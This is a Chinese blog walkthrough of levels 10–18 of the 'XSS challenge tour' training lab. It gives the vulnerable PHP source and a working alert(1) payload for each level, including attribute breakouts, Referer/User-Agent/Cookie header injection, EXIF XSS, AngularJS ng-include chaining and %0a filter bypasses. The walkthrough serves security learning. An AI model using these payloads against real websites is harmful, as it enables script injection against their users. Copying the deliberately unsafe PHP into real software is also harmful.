XSS挑战之旅(10-18)

最新推荐文章于 2023-03-16 22:25:08 发布
最新推荐文章于 2023-03-16 22:25:08 发布
阅读量671 收藏 3
点赞数
分类专栏: # XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/108318423
版权

文章目录

第十关

构造url提交

level10.php?keyword=<script>alert(1)</script>

首先ctrl+U看一下页面源码:

<h1 align=center>欢迎来到level10</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>

<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
</form>

可以看到尖括号用实体符号表示了。但是页面有三个隐藏的input。试了一下发现只有第三个会被页面处理。
再看一下后台的源码:

<?php 
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
?>

这里的t_sort参数是以get方式接收的,并且插入到第三个input的value中。(还没有任何防护)

payload

level10.php?keyword=123&t_sort=" οnclick="alert(1)" type="text

第十一关

本关和第十关相似,也有几个隐藏的input,但是不能用第十关的payload了。

<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="&quot; οnclick=&quot;alert(1)&quot; type=&quot;text" type="hidden">
<input name="t_ref"  value="" type="hidden">
</form>

这里可以看到,t_sort中的引号被替换为了字符实体。但是这里多了一个t_ref的input,可以尝试在这个input中注入。但是通过多次测试,发现后台好像没有接受这个t_ref的值。但是有时候t_ref却会从后台接收到值而显示。
如下图:
在这里插入图片描述
当把第一个input的type改成text后传进去一个123条后

在这里插入图片描述
发现页面返回给了t_ref一个值。

http://192.168.0.106:7788/xss/xss/level11.php?t_link=123&t_history=123&t_sort=123&keyword=good%20job!

这里可以发现:t_ref最终的结果就是本次请求的链接。
到这里就没思路了,用burp抓个包看看。

在这里插入图片描述
这就清晰了,发现t_ref和请求中的referer字段是相同的。那就构造一个事件试一下
在这里插入图片描述
referer字段后面添加payload

" οnclick="alert(1)" type="text

在这里插入图片描述
最终通关成功!!!

接着看一下源码,分析一下

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里是接收了请求头的referer字段,然后将尖括号置空最后返回给input
而这里直接构造url访问,浏览器是不会给服务器传referer字段的。必须要从页面中跳转,才会有referer字段的生成。

不知道referer的可以看一下这篇文章HTTP请求头中的referer字段
或者百度一下。

第十二关

这个和第十一关类似,此处的注入点是请求头中的user-agent字段。burp拦截后修改其值,添加一个弹框事件即可。
在这里插入图片描述

第十三关

先看一下网站源码

<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_cook"  value="call me maybe?" type="hidden">
</form>

这里多了一个t_cook标签。根据前两关的经验,这东西应该就是注入点。
但是怎么提交上去呢?修改type是提交不了的。通过burp抓包发现,此字段的value取值于网页发送的cookie,因此在cookie中嵌入事件构成弹框。
在这里插入图片描述

第十四关

本关考察的知识点是:exif xss

由于靶场给的链接不能用了,自己找了些这方面的博客,然后简单的复现了一下这个漏洞。博客链接我会放到下面。

首先了解一下EXIF

可交换图像文件格式(英语:Exchangeable image file format,官方简称Exif),是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。 -------百度百科

大概意思就是.jpg文件中的对于照片相关的属性可以人为的更改,如下图:
在这里插入图片描述
我们把照相机制造商的内容该成了一段js代码。这样当浏览器访问图片时,在解析图片详细信息的时候会触发js代码执行js脚本。

为了复现这个漏洞,在这里我们需要用到一个chrome插件,EXIF Viewer Classic。商店搜索下载一下。
在这里插入图片描述
安装好以后,去网上下载一个.jpg的文件,然后把属性改成js代码。传到自己搭建的服务器上。

然后用chrome访问这张图片。
结果如图:
在这里插入图片描述

1. 【巨人肩膀上的矮子】XSS挑战之旅—游戏通关攻略(更新至18关)
2. 讲讲EXIF Viewer XSS漏洞的来龙去脉
3. exif xss 复现

第十五关

通过这一关学习到了一个新的知识点:angularJS ng-include指令。
作用:

ng-include 指令用于包含外部的 HTML 文件。
包含的内容将作为指定元素的子节点。
ng-include 属性的值可以是一个表达式,返回一个文件名。
默认情况下,包含的文件需要包含在同一个域名下。—菜鸟教程

源码:

<?php 
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

可以先给level2.php传进去看看效果:
在这里插入图片描述
看到这里是把level2.php的页面也嵌进去了。那么该页面就可以利用level2.php的漏洞通关。

在url中构造好payload

/level15.php?src=%27level2.php?keyword=%22%20οnclick=%22alert(1)%27

菜鸟教程:ng-include指令

第十六关

通过测试,本关是将script和空格都进行了改写。
看网页源码:

<center>1</center><center><img src=level16.png></center>

被插入的地方还是位于center标签内。这里的思路是构造新的标签弹框。
payload

level16.php?keyword=<img%0asrc=1%0aοnerrοr=alert(1)>

利用html编码的空白字符%0a代替空格。

第十七关

通过网页源码可以发现,传入的参数在下方输出到页面上:

<embed src=xsf01.swf?a=b width=100% heigth=100%><h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>

网页后台又对参数进行了实体编码转换,这里构造事件进行弹框。
payload

level17.php?arg01=a&arg02=1%20οnmοuseοver=alert(1)

第十八关

本关和十七关相同。
payload

level18.php?arg01=a&arg02=b%20οnmοuseοver=alert(1)
老司机开代码
关注
专栏目录
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 365
好。
xss labs 挑战之旅
lemonwei
06-05 787
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一关,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二关进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
XSS挑战之旅
weixin_41182861的博客
09-26 2040
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
xss挑战之旅
m0_71326960的博客
03-16 321
使用docker搭建xss挑战之旅运行环境,xss挑战之旅level1-level3
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1447
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS挑战之旅练习1-13
m0_53223419的博客
03-16 286
使用docker搭建靶场。
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2602
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
使用docker搭建xss挑战之旅环境
DXfighting_的博客
04-14 1138
docker search XSS-challenge-tour 搜索镜像 Docker pull 下载镜像 Docker images 查看存在镜像 dockerrun-dt--nameXSS-challenge-tour-p84:80--rmc0ny1/XSS-challenge-tour,运行镜像文件 打开网页,查看是否成功 ...
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 928
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
xss挑战之旅11关到13关,操作步骤配截图。
jzzer447的博客
04-15 574
level11 分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。 头部本身没有Referer,自行添加了 payload:Referer:" onmouseover=alert(11) type="text" Referer:" onclick="alert(11)" type="text level12...
XSS挑战之旅Level(1-5)
m0_52701599的博客
03-10 444
XSS挑战之旅Level(1-7)详细步骤
我的XSS挑战之旅
Atkx's Blog
08-08 574
XSS挑战之旅 Level 1 发现参数name的内容是一个注入点,并且没有任何过滤 payload:?name=test<script>alert('xss')</script> Level 2 和第一关差不多,在搜索框中输入 <script>alert('xxs')</script> 没有出现弹窗 查看一下源代码 需要把前面的<input>标签给闭合掉 在搜索框中输入 "><script>alert('xxs'
XSS学习-XSS挑战之旅(二)
Lemon's blog
07-24 571
前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识。 第十一关
XSS闯关挑战
weixin_34417200的博客
05-15 227
XSS跨站*** 本文参考公众号07v8论安全 XSS***全称跨站脚本***,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS***分成两类1、一类是来自内部的***,主要指的是利用程序自身的漏洞,构造跨站语句。2、另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页...
1.xss之旅—Level1
qwsn
03-13 1607
XSS过程: URL栏: ?name=<script>alert(123)</script> ?name=<script>alert('123')</script> ?name=<script>alert("123")</script> ?name=<script>alert(/123/)</script&g...
XSS挑战之旅1-10
weixin_52116519的博客
11-15 1520
XSS漏洞介绍。
http://xss.tesla-space.com/
最新发布
07-27
- *1* *2* *3* [从xss挑战之旅来重读xss(一)](https://blog.csdn.net/wy_97/article/details/102968400)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值